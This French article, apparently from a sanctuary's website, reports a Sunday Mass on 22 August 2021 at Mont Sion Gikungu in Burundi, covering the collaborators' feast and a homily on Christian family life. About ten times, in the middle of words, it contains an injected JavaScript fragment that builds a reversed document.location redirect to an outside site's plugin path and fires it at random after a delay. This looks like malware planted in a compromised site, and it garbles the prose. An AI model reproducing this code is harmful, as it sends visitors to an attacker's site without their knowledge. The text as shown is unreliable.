La célébration eucharistique du dimanche 22 août 2021 au Sanctuaire de la Reine de la Paix et Réconciliation de Mont Sion Gikungu a englobé deux célébrations importantes, une au niveau de l’Eglise universelle et une autre au sein de la pastorale du Sanctuaire. En ce huitième jour après la solennité de l’Assomption, l’Eglise universelle fête Marie Reine. En cette même date, le Rectorat du Sanctuaire a prévu une fête de tous les collaborateurs de la pastorale du Sanctuaire. Les collaborateurs sont toutes les personnes qui aident et interviennent dans l’organisation, la passation et le suivi de toute forme d’apostolat du Sanctuaire. La célébration eucharistique de ce dimanche a été présidée par l’Abbé Gérard NDUWIMANA, un membre du groupe de prêtres diocésains schoenstattiens. Il avait à ses côtés bien d’autres prêtres toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont le Père Recteur du Sanctuaire, le Père COYITUNGIYE Herménégilde.  L’animation du chant liturgique a été assurée par toutes les chorales en apostolat au sanctuaire, c’est-à-dire huit en tout, y compris celles de petits enfants de moins de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douze ans. Les lectures du jour furent respectivement tirées du Livre de Josué (24, 1-2. 15-17), l’Epitre de saint Paul aux Ephésiens (5, 21- 32) et l’Evangile selon saint Jean (6, 60-69).

Tout au début de la Messe, le Père Recteur du Sanctuaire a prononcé une allocution dans laquelle il a souhaité la bienvenue à tout un chacun en leur souhaitant une bonne méditation dans la paix et la tranquillité du cœur, tout en espérant que la vierge Marie est à l’œuvre en intercédant pour tous. Il a ensuite fait mention de la fête des collaborateurs que le Rectorat tient à organiser une fois l’an en accord avec tous les concernés. Ceux-ci se regroupent en trois grands groupes, à savoir la coordination des commissions (Communication, Liturgie, Décor, Encadrement des enfants, Protocole, Santé, Sécurité, Action Carême, Cercle d’atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration, Aménagement et Justice et Paix), la coordination des chorales (C. saint Nicolas de Flüe, C. sancta Maria, C. sainte Famille, C. sainte Thérèse de l’Enfant Jésus et de la sainte Face, C. saint Martin, C. sainte Maria Goretti, C. Saint Philippe Néri et la Chorale Pueri Cantores sainte Maria Goretti) et le Renouveau Charismatique Catholique. A ces trois, on ajoute la Coordination des jeunes et les amis de la Radio Maria Burundi. Ce medium joue un rôle non moins négligeable dans la publication de certains des programmes du Sanctuaire sur ses ondes.

La fête des collaborateurs est une bonne occasion pour ceux-ci de se rencontrer, se réjouir ensemble sans oublier le fait de se souvenir de leurs frères et sœurs dans l’apostolat qui sont morts. A ce niveau, le Père Recteur a mentionné le Père Ottmar Lantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doldt décédé le 3 août 2020 et toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont la tombe est dans les enceintes de Mont Sion Gikungu. A la fin de son allocution, il a remercié toutes les personnes ayant aidé dans l’organisation et le déroulement de la fête. Le Père Recteur n’a pas oublié d’en appeler à la conscience et à la vigilance de tous à retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doubler d’effort dans l’observance des mesures d’hygiène pour éviter la propagation de la covid-19 sans oublier de prier ardemment pour l’évanouissement de cette pandémie qui ne fait que trembler le monde.

Après la lecture des Textes du jour, l’Abbé Gérard a procédé à l’homélie au cours de laquelle il a d’abord exprimé sa joie de revisiter le sanctuaire après un bon bout de temps à l’étranger. Des trois lectures proposées, nous pouvons retenir deux choses les plus importantes, à savoir que Dieu aime la vie et nous appelle à l’aimer de même que celle des autres et que ce même Dieu protège la vie tout en nous appelant à protéger la nôtre et celle de notre prochain. Nous venons de lire l’épitre de saint Paul aux Ephésiens par quatre fois de suite depuis le dernier dimanche du mois de juillet dernier. C’est un texte qui dispense un enseignement important pour notre vie personnelle et en famille. « Notre vie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit être réellement chrétienne, que nous soyons homme ou femme. Nos foyers et nos familles ne sauraient être bons et vivants que s’ils sont fondés sur Jésus et la Parole de Dieu », a insisté l’Abbé Gérard.

Les hommes qui généralement planifient, exécutent de grands projets ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent pas non plus oublier qu’il y a de petites et simples actions qui construisent la vie, tels que toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner une simple fleur à sa femme ou lui siffler un petit Je t’aime qui calme un esprit fatigué et stressé tout en réveillant les sentiments affectifs. Les femmes quant à elles sont tenues de marque du respect et d’exprimer en termes clairs leurs souhaits et désirs au lieu de le faire par des murmures qui ne font qu’augmenter le stress et suscitent du suspect entre les conjoints et voisins. Dieu, Protecteur de la vie, nous invite à avoir foi et confiance en Lui. En faisant ainsi, nous aurons montré que tout ce que nous sommes et ce que nous avons vient de Lui, qui a les Paroles de la vie éternelle.

Signalons qu’après le cretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do il y a eu un groupe de fidèles qui ont couronné la vierge Marie et un autre qui a renouvelé ce couronnement. Au début de l’offertoire, les collaborateurs ont eu l’occasion de présenter devant l’autel des bouquets de fleurs, des cierges allumés et des offrandes en natures en signe de remerciement à Dieu pour son amour et sa patience envers son peuple faible avec peu de foi.

NYANDWI M.